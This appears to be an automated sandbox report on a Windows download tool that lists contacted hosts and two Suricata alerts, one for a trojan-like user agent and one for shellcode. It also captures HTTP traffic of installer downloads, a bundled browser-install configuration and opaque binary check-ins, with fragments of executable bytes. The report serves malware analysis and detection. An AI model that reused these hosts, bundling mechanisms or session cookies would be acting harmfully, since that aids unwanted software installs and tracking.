hub5u.hz.sandai.net 58.254.134.144
relay.phub.hz.sandai.net 58.254.134.245
hub5p.hz.sandai.net 58.254.134.206
master.etl.desktop.qq.com 163.177.71.163
hubstat.sandai.net 123.129.242.179
time.windows.com 40.69.40.157
hubstat.hz.sandai.net 123.129.242.154
hub5sr.shub.hz.sandai.net 123.129.242.139
hub5pnc.hz.sandai.net 119.189.1.17
score.phub.hz.sandai.net 163.177.79.152
imhub5pr.hz.sandai.net 58.254.134.209
c.pc.qq.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (HttpDownload)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2977793-3168363
Referer: hXXp://112.5.251.213/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:15 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2467523-3168363
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8619057-8619213
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=1065841-1701145
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:34 GMT
Content-Type: application/octet-stream
Content-Length: 635305
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 1065841-1701145/11709528
.....N...8..E..F.Ti..I.XIDzdX..F..V.c .........Lgd.....f.."..{.#...>
;]...;}0*.%xT...2G..X.....>1.......s..vK..ZC.%..E'....@..:....KI..M
.o...?..}.t#.......rd...(.....B..s...8..4..k.l...dm8..fxA......R.<'
........`v.k.Q..eE,..p..?DM.B....'U...a.8.$..z..1.1.....r..-....D...[\
.*t..|.... .l`#.'3K-4i...q...l..|.m|j...`~...\..........L..0.f.,#..K .
{.,<G....i...F..vEx..N..g.A...c.R#.$.n.p....W5...^.....*W..;.......
.=..eu...R.............xY8.4.8ZJ.7.2n.....8|G..{...rC.O....&.(.....&.P
.;.Y..|......!.......G;.H.. ..............B.p.a.5{...3?....y...b..K...
.....}d..H*.0...-m..E..;.g.x..*.YB.4.,^..L&.......>N.ac.S.V......!.
%%x..s/.Y|t....;\.H *....%]..Yf&..."......U.../?).}h=.0.I.hv..>. ..
......bU..,..*!...dZ...:.|;~[.Q...X........~!......w,..C'......8zk.!..
4k..d*{H?|.....-..u_.b.U%Hh..V...e.GLG...z{..........?...1n.....6.pnV.
pj...Wf...} .......I..o./.N...]6Mr\.....!.Z......K?..h..1...69 EGy.0F.
3l..F([;<.n...;....|......M=.|G..1Y..^.%....(.][email protected].."o.x.J?.Q..
.O".N..uj..{.W.p.[[email protected]..{*[email protected]..~..:K..7Q
[email protected].[r.....i?....?;D..G...[...U..3.
...W1Q0v...k^.?.V._....g.......LF'..HF(.Ai.n}r9......j.zYr.O.Q1.4..OR.
.}E[K.V..A<7....K.y&__.v..JwP..<~~.(.......w....[..0....C.-...T.
.x.5k.._pH.......u.....Fnj|;.;.l.6.d...UA.t.......F..i/.0......l.....T
*.J-.d&.....^:.;t.L.{i......)....8.h...a4./..mx&q.....W. T&.t.?7.....I
t}k....'^..J.v..)R]..m|.MJY.7.U.?9..eV.f.....p.L:..>.....<Kt....
&i...hV......b..2..N..i......... ..$Z2...>I f....o:....G.y?.?%6
<<< skipped >>>


POST / HTTP/1.1
Host: 58.254.134.207:80
Content-type: application/octet-stream
Content-Length: 140
Connection: Keep-Alive

A............'....Wr.U..X.y.d..C.._p.T.!.b..s..7.......[...&...D..b.&.."..u\A......
.....4..z.[H.......o%M....B7..44".6..%..S.......Q.....N
HTTP/1.1 200 OK
Content-Length: 44
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 44..Content-Type: application/octet-s
tream..Connection: Close..A....... ........7N1O...=.G.....v.Zh.....4..
..



GET /cooperation/popuprecommend/installfinishbind-qqbrowser.xml HTTP/1.1
User-Agent: HttpRequest
Host: yze.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 200 OK
Date: Thu, 19 May 2016 04:36:32 GMT
Content-Type: text/xml
ETag: "467858975"
Accept-Ranges: bytes
Last-Modified: Wed, 06 Jan 2016 03:10:41 GMT
Vary: Accept-Encoding
Content-Length: 3306
Server: WS CDN Server
Age: 9396
Via: 1.0 db80:82 (Cdn Cache Server V2.0)
Connection: close
<?xml version="1.0" encoding="utf-8"?>.<DOCUMENT>..<bin
dtype><![CDATA[installfinishbind]]></bindtype>.    <
item>.        <weight><![CDATA[0]]></weight>.    
    <name><![CDATA[QQBrowser]]></name>...<appchec
kurl><![CDATA[hXXp://t.sogou.com/update_platform/update.php?appn
ame=sogoudownload_bindsecontrol&v=1.0.0.0]]></appcheckurl>...
<appcheckreporturl><![CDATA[hXXp://t.sogou.com/update_platfor
m/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1]]>
</appcheckreporturl>...<silentinstall><![CDATA[false]]&
gt;</silentinstall>...<installprivilege><![CDATA[false]
]></installprivilege>...<installtype><![CDATA[instal
lpackage]]></installtype>...<installedfeature>....<t
ype><![CDATA[keyandpath]]></type>....<key><![C
DATA[HKEY_LOCAL_MACHINE\SOFTWARE\Tencent\QQBrowser]]></key>..
..<valuename><![CDATA[Exe]]></valuename>....<file
><![CDATA[]]></file>...</installedfeature>...<
installedfeature>....<type><![CDATA[keyandpath]]></t
ype>....<key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432N
ode\Tencent\QQBrowser]]></key>....<valuename><![CDAT
A[Exe]]></valuename>....<file><![CDATA[]]></fi
le>.        </installedfeature>...<installpackage>....&
lt;url><![CDATA[hXXp://dldl.qq.com/dl/sogoudl]]></url&
<<< skipped >>>


GET /appinfo?num=13897 HTTP/1.1
User-Agent: HttpDownload
Host: yz.app.sogou.com


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:44 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: IPLOC=UA; expires=Fri, 19-May-17 07:12:44 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=DA60F2C28460900A00000000573D676C; expires=Wed, 14-May-36 07:12:44 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
25d..status=true&softurl=http://wap.sogou.com/web/redir.jsp%
3Fappdown=1&u=-9C432O39iSuy4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5ka
abGHHpARrtteyVXkpO1EM9dsDQreZHL5I5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvN
yRK4fWevzSqGGyR3Ek0.&pcid=2320808333768086190&w=1950&filenam
e=WiFi-2175.exe&extra=9_pconline&downloadtype=software&iconu
rl=http://imgstore.cdn.sogou.com/v2/thumb/retype/ext/a
uto/cls/imagick?appid=200504&url=http://www1.pconlin
e.com.cn/download/zt/2013/ico/pc4848.jpg&softname=WiFiå…
±äº«å¤§å¸ˆ&softsize=11.2 MB...0..HTTP/1.1 200 OK
..Server: nginx..Date: Thu, 19 May 2016 07:12:44 GMT..Content-Type: te
xt/plain; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-
alive..Set-Cookie: IPLOC=UA; expires=Fri, 19-May-17 07:12:44 GMT; doma
in=.sogou.com; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI P
UR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Set-Cookie: SUID=DA60F2C2
8460900A00000000573D676C; expires=Wed, 14-May-36 07:12:44 GMT; domain=
.sogou.com; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR 
INT DEM STA PRE COM NAV OTC NOI DSP COR"..Cache-Control: no-cache..Exp
ires: Thu, 01 Jan 1970 00:00:00 GMT..25d..status=true&softurl=http:%
2F/wap.sogou.com/web/redir.jsp?appdown=1&u=-9C432O39iSuy
4v1X8mdGjRXb1ARchpxyTVF7GApCN1tS4L5kaabGHHpARrtteyVXkpO1EM9dsDQreZHL5I
5rGNjItwiFZhBlM4pEm_3H9kSlCMAp8imlWvNyRK4fWevzSqGGyR3Ek0.&pcid=232
0808333768086190&w=1950&filename=WiFi-2175.exe&extra=9
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2977793-3168363
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:27 GMT
Content-Type: application/octet-stream
Content-Length: 11709528
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..............Y...Y
...Y.L.Y...Y.L.Y...Y...Y...Y..TY...Y..CY...Y..FY...YRich...Y..........
......PE..L...-..S.................h.......B...5............@.........
.................p.......C......................................D.....
... ..XF..........8... ...............................................
.............................................text....g.......h........
.......... ..`.rdata..Z............l..............@[email protected]......
....................@....ndata...................................rsrc.
..XF... ...H..................@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected].....@
..}[email protected]... M..........M........E...FQ.....NU..M
.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected][email protected][email protected] [email protected]..
...@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S..
...t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5733707-5971727
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=5912223-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: application/octet-stream
Content-Length: 5797305
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 5912223-11709527/11709528
.b....v..x|....f......)...v...7.x..7L.TR.|..H./.H..w.q{%....]q.....<
;>\...0..bc.>.)P....${E}[email protected]@p.{N..I...Kv...g.:F...P...d.
.EEx..>fD]|..|..\.N..x.._.#.]`.".X.!..%.....i.6YZ<........|.....
..o......GB..D........!....pW.:....{...(.......~Z..5Sx:Y.....&(..N.5*.
Y$=..X.XD1..%m.v.@.}JU.%<....&j..i.....]............td.......Xb....
.ZI1.......)..L=9.#..e..V...C...w`.....E..7.E..`.TP(..r0....P.t....5..
c.Q.n.......3....S.M....G.].....%..Sw...m..\.......H..U...,..{Y...Y._.
<.:........e3O.'^.p..$)j...ke...Bo}.o..t.;.BRkT..`.!5k:~..1L.......
..!u......4...^.CjHs.!0....JF..Xca(... }X...V.{FB.....!...y.MI ./1...f
..).u|n....@3...$.]].m_.......wd$.....t....a........%y&.tS[.W..Eb.....
`..#.fN.%..W...\L9......f.X..k....I..L..0..=zzJ.dS..J.K..j...`)...xQ..
....!..#..*.F.b...........;W.<.G...........BZc...:..........r...D..
.kRZ.C...C.ol.o'i..4"`...I|....C.:.D.."j..;.......%:5Q8..{.K.5'......i
[email protected].{3b..5b....*..<.....n..V.5.....1..5...}.....o...F.
.j.|..!....'....4..w.C..OH.R..qR.5...,..........A...........B.q.....-.
.......tR#..(.n.t..u..G........N.a)..-.^:.1...'!n./t.z...x(........H*.
rk.......R8([email protected]#`.0.t../.v..6)...}.Z ..QIPnY. E....T.ft.= D.g.
T...?0<.~O......K..C.3.......... X..s.......D..K.{>...xa.$..Z^..
....I^.A..4...[.#.=F%.;.}.P..v;...8Z.k&..U5.y..]........n*.uNW^\{.....
.`...V.,H?. (D..l.v7...!.O.g..t...p...G....[s&8l'^....X. ..s."v5..K.(.
....G.V.`Z...m.....K.cxF..n.`M1...))..P.^l5.^.P.([email protected]
....dk..y.*VT......r.aVQ.D..5.....{J..*........>.E....W.\.l..u.
<<< skipped >>>


GET /ie-css3.htc HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Length: 11952
Connection: keep-alive
ETag: "AVYcdCtTP6x"
Last-Modified: Tue, 17 May 2016 07:16:19 GMT
Accept-Ranges: bytes
...Do not remove this if you are using.....Original Author: Remiz Rahn
as..Original Author URL: hXXp://VVV.htmlremix.com..Published date: 200
8/09/24..Changes by Nick Fetchak:..- IE8 standards mode compatibility.
.- VML elements now positioned behind original box rather than inside 
of it ... should be less prone to breakage..- Added partial support fo
r ...box-shadow... style..- Checks for VML support before doing anythi
ng..- Updates VML element size and position via timer and also via win
dow resize event..- lots of other small things..Published date : 2010/
03/14..hXXp://fetchak.com/ie-css3..Thanks to TheBrightLines.com (http:
//VVV.thebrightlines.com/2009/12/03/using-ies-filter-in-a-cross-browse
r-way) for enlightening me about the DropShadow filter..timer_length =
 200; // Milliseconds..border_opacity = false; // Use opacity on borde
rs of rounded-corner elements? Note: This causes antialiasing issues..
// supportsVml() borrowed from hXXp://stackoverflow.com/questions/6541
12/how-do-you-detect-support-for-vml-or-svg-in-a-browser..function sup
portsVml() {..if (typeof supportsVml.supported == ...undefined...) {..
var a = document.body.a(document_createElement_x_x_x_x_x(...div...));.
.a.innerHTML = ...;..var b = a.firstChild;..b.style.behavior = ...url(
#default#VML)...;..supportsVml.supported = b ? typeof b.adj == ...obje
ct...: true;..a.parentNode.removeChild(a);..}..return supportsVml.supp
orted..}..// findPos() borrowed from hXXp://VVV.quirksmode.org/js/find
pos.html..function findPos(obj) {..var curleft = curtop = 0;..if (
<<< skipped >>>

GET /img/recommend-btn.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f..The URL has moved <a href="hXXp://xz.sogou.com/error">here&l
t;/a>...0..HTTP/1.1 404 Not Found..Server: nginx..Date: Thu, 19 May
 2016 07:13:15 GMT..Content-Type: text/html; charset=utf-8..Transfer-E
ncoding: chunked..Connection: keep-alive..Cache-Control: no-cache..Exp
ires: Thu, 01 Jan 1970 00:00:00 GMT..Location: hXXp://xz.sogou.com/err
or..3f..The URL has moved <a href="hXXp://xz.sogou.com/error">he
re</a>...0......


GET /img/recommend-btn.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: hXXp://xz.sogou.com/error
3f..The URL has moved <a href="hXXp://xz.sogou.com/error">here&l
t;/a>...0......


POST /ajax/loadItem HTTP/1.1


x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: hXXp://xz.sogou.com/softRecommend
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Content-Length: 9
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv

classId=1
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
f36..{"data":[{"docid":"-3080605666447722537","time":"2016-05-12","det
ails":"........................","name":"QQ","downloadnum":"0","pid":"
34","cid":"1","logo_url":"http:\/\/cmc.imgstore.cdn.sogou.com\/net\/a\
/16\/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-
3080605666447722537.png&r=null","size":"54.26MB","hd_data":"{\"doc
id\":\"-3080605666447722537\",\"icon\":\"http:\\\/\\\/dl.app.sogou.com
\\\/pc_logo\\\/-3080605666447722537.png\",\"name\":\"QQ\",\"pid\":\"34
\",\"cid\":\"1\",\"size\":\"54.26MB\",\"sogouHighdownUrl\":\"http:\\\/
\\\/xiazai.sogou.com\\\/comm\\\/redir?softdown=1&u=YRyEVuHeM45mBjjEUSP
VUEJm8GF_McJfVdEjKPrgnocp6RPTnPFSKls2-N19zn1Vkn7odhWiVY2XtB1GttVabv1-A
DEcrdTQ-iKClemVEPIO-inS8VQTtv5V2hDxQGVyuN87GS8Q0oehm6RfSK3qEdVQPXpgHp2
il8CR4XguctomFjdOpBN0epdYeddfMeUW&pcid=-3080605666447722537&filename=Q
Q8.3.exe\"}"},{"docid":"-3726774318030095000","time":"2016-04-25","det
ails":"........................","name":"QQ.........","downloadnum":"0
","pid":"34","cid":"8","logo_url":"http:\/\/cmc.imgstore.cdn.sogou.com
\/net\/a\/16\/link?appid=16&url=http://dl.app.sogou.com/pc
_logo/-3726774318030095000.png&r=null","size":"45.19MB","hd_data
":"{\"docid\":\"-3726774318030095000\",\"icon\":\"http:\\\/\\\/dl.app.
sogou.com\\\/pc_logo\\\/-3726774318030095000.png\",\"name\":\"QQ......
...\",\"pid\":\"34\",\"cid\":\"8\",\"size\":\"45.19MB\",\"sogouHighdow
nUrl\":\"http:\\\/\\\/xiazai.sogou.com\\\/comm\\\/redir?softdown=1&u=0
Gd8piB609380vCOL7GwJe7o9WVvkHDR1GVQjUnAqC9OEkUqaXdOjADHbxOU-93snoE
<<< skipped >>>

GET /softassis/img/ranking-ico.png HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xz.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; JSESSIONID=aaaBCX7sZraLvhokg3htv


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 1103
Connection: keep-alive
Last-Modified: Tue, 17 May 2016 07:09:36 GMT
ETag: "573ac3b0-44f"
Expires: Sun, 22 May 2016 07:13:18 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
[email protected] ImageReadyq.e&
lt;...&iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:07A25883293D11E5BA4C
CD9836B368CC" xmpMM:DocumentID="xmp.did:07A25884293D11E5BA4CCD9836B368
CC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:07A25881293D11
E5BA4CCD9836B368CC" stRef:documentID="xmp.did:07A25882293D11E5BA4CCD98
36B368CC"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>Y..n....IDATx.b.......0..%.....8..h.3..
...D.C@@...J`..Q.F.....@|....`.....@[email protected]...{Py..d...K ^[email protected]
[email protected]....`3.8|.%HP.....db.^O..F..Q.F..5hp.k..T...[.=...)...^.b;Z
...4j..A..^.bK.z. ...umH..D.....IEND.B`.HTTP/1.1 200 OK..Server: nginx
..Date: Thu, 19 May 2016 07:13:18 GMT..Content-Type: image/png..Conten
t-Length: 1103..Connection: keep-alive..Last-Modified: Tue, 17 May 201
6 07:09:36 GMT..ETag: "573ac3b0-44f"..Expires: Sun, 22 May 2016 07:13:
18 GMT..Cache-Control: max-age=259200..Accept-Ranges: bytes...PNG.....
[email protected] ImageReadyq.e<..
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5945803-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
